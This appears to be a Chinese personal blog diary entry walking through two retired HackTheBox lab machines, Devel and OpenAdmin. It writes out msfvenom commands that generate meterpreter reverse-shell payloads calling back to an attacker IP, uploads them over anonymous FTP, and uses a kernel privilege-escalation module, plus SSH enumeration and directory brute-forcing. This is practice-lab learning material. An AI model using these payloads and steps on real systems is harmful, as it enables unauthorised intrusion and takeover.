1. 上班
2. 修正博客样式
3. SDL_GameControllerDB_Util发新版本
4. HackTheBox Retired 【Devel】打掉 (试过 没思路 最终看了tutorial……哭)
4.1 nmap
惯例nmap
1 | nmap -v -A -Pn 10.129.123.162 |
4.2 信息搜集
google Microsoft IIS httpd 7.5 cve
行 一个个试试 先是CVE-2010-3972
从msf搜索CVE-2010-3972,找到auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof
等等 这是个auxiliary……
这个好像是个检测件?
那算了 找下一个
CVE-2010-2730 无
CVE-2010-1256 无
……接下来试了一堆奇奇怪怪地CVE,没啥收获
4.3 上传reverse shell
哦。原来这个FTP tm匿名用户竟然允许上传啊
这么弟弟吗
这直接传上去个php的webshell或者reverseshell不就……
google metasploit php reverse shell payload
得到 https://docs.j7k6.org/php-reverse-shell-metasploit/
1 | msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=2468 -f raw -o shell.php |
生成php reverse shell
然后
1 | msf6 > use exploit/multi/handler |
起来监听器……
本来应该是这样但是似乎 php 这台机子 没法。。。
所以再来一次 这次用asp
参考这个
1 | https://blog.rapid7.com/2009/12/28/exploiting-microsoft-iis-with-metasploit/ |
先看看payloads都有哪些和asp相关的的?
1 | msfvenom --list payloads |
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=2468 -f asp > shell.asp |
emmm最后怎么说呢 asp传上去以后还是无法访问 就很烦
4.4 学习tutorial
啊啊啊啊啊啊啊啊啊啊 题解 用的 是 aspx!!!!!!
这好像 是 唯一的不同
我tm用的asp
重来一次
下
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=2468 -f aspx > shell.aspx |
1 | msf6 > use exploit/multi/handler |
去草一下浏览器的aspx
1 | msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to 10.129.123.162 |
然后是提权
以下抄录一段原文
Privilege Escalation
Running sysinfo
in the Meterpreter session reveals that the target is x86 architecture, so it is
possible to get fairly reliable suggestions with the local_exploit_suggester
module. The same can
not be said for running the module on x64. Running the suggester gives the following
recommended escalation modules:
● exploit/windows/local/bypassuac_eventvwr
● exploit/windows/local/ms10_015_kitrap0d
● ... and 9 more ...
Going down the list, bypassauc_eventvwr
fails due to the IIS user not being a part of the
administrators group, which is the default and to be expected. The second option,ms10_015_kitrap0d
, does the trick. The flags can now be obtained fromc:\Users\babis\Desktop\user.txt.txt
and c:\Users\Administrator\Desktop\root.txt.txt
原来如此
还有local_exploit_suggester
这种好东西啊
……试试看
先是sysinfo
1 | meterpreter > sysinfo |
然后local_exploit_suggester
1 | meterpreter > run post/multi/recon/local_exploit_suggester |
1 | use exploit/windows/local/ms10_015_kitrap0d |
1 | msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d |
4.4 复盘
4.4.1 asp不行的时候 该试试aspx的
4.4.2 学会sysinfo
4.4.3 学会local_exploit_suggester
4.4.4 学会sessions的比较复杂的用法
5. HackTheBox Retired 【OpenAdmin】打了一半 (又被迫看tutorial的提示了 残念……过菜了)
5.1 nmap
惯例nmap
1 | nmap -v -A -Pn 10.129.123.181 |
5.2 信息搜集
google搜索 openssh 7.6p1 exploit
得到一个用户名枚举问题?
https://hackerone.com/reports/776461
然后得到一个py文件?
sshuserenumeration.py
1 | #!/usr/bin/python |
捞到一个cve CVE-2016-6210
所以使用auxiliary/scanner/ssh/ssh_enumusers
1 | msf6 > use auxiliary/scanner/ssh/ssh_enumusers |
这件tm能用???
emmm没思路
5.3 gobuster一波
gobuster dir -u http://10.129.123.181/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
得到music页
点击右上角login进入ona
页面左侧显示
1 | Newer Version Available Min/Max |
点击 DOWNLOAD the latest version
超链接,获得这个网页管理软件的名字为OpenNetAdmin
用OpenNetAdmin
和版本号v18.1.1
取得CVE
……也可以直接去metasploit源码里全文搜索OpenNetAdmin
就完事了
找到exp exploit/unix/webapp/opennetadmin_ping_cmd_injection
- 本文作者: XenoAmess
- 本文链接: http://xenoamess.com/2021/03/27/20210326修行/
-
版权声明:
本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。